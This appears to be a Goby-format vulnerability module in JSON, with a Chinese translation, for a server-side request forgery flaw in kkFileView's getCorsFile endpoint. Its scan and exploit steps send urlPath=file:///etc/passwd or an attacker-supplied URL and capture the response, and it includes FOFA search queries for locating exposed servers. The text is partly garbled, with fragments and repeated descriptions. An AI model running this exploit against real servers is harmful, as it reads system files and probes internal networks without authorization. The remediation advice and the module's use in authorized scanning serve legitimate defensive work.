kkFileView This project is an online preview project solution for files and documents. The paid products in the industry include [Yongzhong office] [office365] [idocv], etc. After obtaining the approval of the company's top management, it will be open sourced under the Apache protocol to feed the community. Special thanks @ The support of Mr. Tang and the contribution of @ Duanmu Xiangxiao. The project uses the popular spring boot to build, easy to use and deploy, and basically supports online preview of mainstream office documents, such as doc, docx, Excel, pdf, txt, zip, rar, pictures, etc.
This vulnerability appears in: file-online-preview\\jodconverter-web\\src\\main\\java\\cn\\keking\\web\\controller\\OnlinePreviewController.java
When previewing files across domains, the urlPath parameter is user-controllable. By modifying this parameter, SSRF vulnerabilities can be triggered and server intranet information can be detected.
", "Product": "kkFileView", "Homepage": "https://github.com/kekingcn/kkFileView", "DisclosureDate": "2020-06-14", "Author": "桂花松糕", "FofaQuery": "body=\"kkfileview.keking.cn\"&&body=\"onlinePreview?url=\"", "GobyQuery": "body=\"kkfileview.keking.cn\"&&body=\"onlinePreview?url=\"", "Level": "2", "Impact": "When previewing files across domains, the urlPath parameter is user-controllable. By modifying this parameter, the SSRF vulnerability can be triggered and the server intranet information can be detected (any file that supports the file protocol can be read).
1. Update to the latest version.
2. Set permissions for cross-domain preview files.
", "References": [ "https://fofa.so/" ], "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "ssrf_cmd", "type": "input", "value": "file:///etc/passwd", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/getCorsFile?urlPath=file:///etc/passwd", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "root:x", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/getCorsFile?urlPath={{{ssrf_cmd}}}", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|(?s)(.*)" ] } ], "Tags": [ "Other" ], "VulType": [ "Other" ], "CVEIDs": [ "" ], "CNNVD": [ "" ], "CNVD": [ "" ], "CVSSScore": "8.6", "Translation": { "CN": { "Name": "kkFileView 服务端请求伪造漏洞", "Product": "kkFileView", "Description": "kkFileView 此项目为文件文档在线预览项目解决方案,对标业内付费产品有【永中office】【office365】【idocv】等,在取得公司高层同意后以Apache协议开源出来反哺社区,在此特别感谢@唐老大的支持以及@端木详笑的贡献。该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,Excel,pdf,txt,zip,rar,图片等等。
本次漏洞出现于:file-online-preview\\jodconverter-web\\src\\main\\java\\cn\\keking\\web\\controller\\OnlinePreviewController.java
当通过跨域预览文件的时候,urlPath参数是用户可控的,通过修改此参数,可触发SSRF漏洞,探测服务器内网信息。
1、 更新至最新版本。
2、 跨域预览文件设置权限。
", "Impact": "当通过跨域预览文件的时候,urlPath参数是用户可控的,通过修改此参数,可触发SSRF漏洞,探测服务器内网信息(支持file协议的,任意文件读取)。
kkFileView This project is an online preview project solution for files and documents. The paid products in the industry include [Yongzhong office] [office365] [idocv], etc. After obtaining the approval of the company's top management, it will be open sourced under the Apache protocol to feed the community. Special thanks @ The support of Mr. Tang and the contribution of @ Duanmu Xiangxiao. The project uses the popular spring boot to build, easy to use and deploy, and basically supports online preview of mainstream office documents, such as doc, docx, Excel, pdf, txt, zip, rar, pictures, etc.
This vulnerability appears in: file-online-preview\\jodconverter-web\\src\\main\\java\\cn\\keking\\web\\controller\\OnlinePreviewController.java
When previewing files across domains, the urlPath parameter is user-controllable. By modifying this parameter, SSRF vulnerabilities can be triggered and server intranet information can be detected.
", "Recommendation": "1. Update to the latest version.
2. Set permissions for cross-domain preview files.
", "Impact": "When previewing files across domains, the urlPath parameter is user-controllable. By modifying this parameter, the SSRF vulnerability can be triggered and the server intranet information can be detected (any file that supports the file protocol can be read).